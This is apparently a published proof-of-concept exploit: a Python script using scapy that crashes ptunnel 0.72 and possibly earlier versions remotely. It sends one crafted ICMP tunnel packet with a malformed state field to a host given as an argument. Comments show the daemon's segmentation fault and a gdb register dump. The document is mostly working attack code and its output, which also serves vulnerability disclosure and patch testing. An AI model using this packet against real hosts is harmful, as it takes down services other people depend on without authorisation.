#!/usr/bin/env python
#===============================================================================
# Exploit Title: ptunnel <= 0.72 Remote Denial of Service (ICMP tunnel crash)
# Date: January 2012
# Exploit Author: st3n [at sign] funoverip [dot] net
# Vendor Homepage: http://www.cs.uit.no/~daniels/PingTunnel/
# Software Link: http://www.cs.uit.no/~daniels/PingTunnel/PingTunnel-0.72.tar.gz
# Version: 0.72 (and probably below)
# Tested on: Debian Lenny
#===============================================================================

#===============================================================================
# PoC code (scapy)
#===============================================================================

from scapy.all import *
conf.verbose = 0

# arg ?
if len(sys.argv) < 1:
    sys.exit('Usage: %s <host>' % sys.argv[0])

# target
remote_host = sys.argv[1]

# ptunnel.h
#typedef struct {
#        uint32_t        magic,          //      magic number, used to identify ptunnel packets.
#                        dst_ip,         //      destination IP and port (used by proxy to figure
#                        dst_port,       //      out where to tunnel to)
#                        state,          //      current connection state; see constants above.
#                        ack,            //      sequence number of last packet received from other end
#                        data_len;       //      length of data buffer
#        uint16_t        seq_no,         //      sequence number of this packet
#                        id_no;          //      id number, used to separate different tunnels from each other
#        char            data[0];        //      optional data buffer
#} __attribute__ ((packed)) ping_tunnel_pkt_t;

# build packet
magic='\xd5\x20\x08\x80'
dst_ip='AAAA'
dst_port='BBBB'
state='CCCC'    # <===== this trigger the vulnerability
ack='\x00\x00\xff\xff'
data_len='\x00\x00\x00\x00'
seq_id='DDDD'
pkt = IP(dst=remote_host)/ICMP()/Raw(magic)/Raw(dst_ip)/Raw(dst_port)/Raw(state)/Raw(ack)/Raw(data_len)/Raw(seq_id)

# evil evil packet
send(pkt)

#=========================================================================
# Example & Info
#=========================================================================

# Sending evil packet
# -------------------

# $ sudo ./ptunnel-dos.py 127.0.0.1
# .
# Sent 1 packets.

# Daemon side
# -----------

# $ ptunnel -c lo
# [inf]: Starting ptunnel v 0.72.
# [inf]: (c) 2004-2011 Daniel Stoedle, <daniels@cs.uit.no>
# [inf]: Security features by Sebastien Raveau, <sebastien.raveau@epita.fr>
# [inf]: Forwarding incoming ping packets over TCP.
# [inf]: Initializing pcap.
# [inf]: Ping proxy is listening in privileged mode.
# Segmentation fault

# Debug info
# -----------

#  Program received signal SIGSEGV, Segmentation fault.
#  handle_packet (buf=0x80774a0 "E", bytes=56, is_pcap=1, addr=0xbffff65c, icmp_sock=7) at ptunnel.c:957
#  957                             pt_log(kLog_sendrecv, "Recv: %d [%d] bytes [seq = %d] [type = %s] [ack = %d] [icmp = %d] [user = %s] [pcap = %d]\n",
#  (gdb)
#  (gdb) i r
#  eax            0x3434343        54739779
#  ecx            0x0      0
#  edx            0x3434343        54739779
#  ebx            0x8050184        134545796
#  esp            0xbffff380       0xbffff380
#  ebp            0xbffff468       0xbffff468
#  esi            0xffff   65535
#  edi            0xbffff5c8       -1073744440
#  eip            0x804cdfa        0x804cdfa <handle_packet+494>
#  eflags         0x10202  [ IF RF ]
#  cs             0x73     115
#  ss             0x7b     123
#  ds             0x7b     123
#  es             0x7b     123
#  fs             0x0      0
#  gs             0x33     51

# eof